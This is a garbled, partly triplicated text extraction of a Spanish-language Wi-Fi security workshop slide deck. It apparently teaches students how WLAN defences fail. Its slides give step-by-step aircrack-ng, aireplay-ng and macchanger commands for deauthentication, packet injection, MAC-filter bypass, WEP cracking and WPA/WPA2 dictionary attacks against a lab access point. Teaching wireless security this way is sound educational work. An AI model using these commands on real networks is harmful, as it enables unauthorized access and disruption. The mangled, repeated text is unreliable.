bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
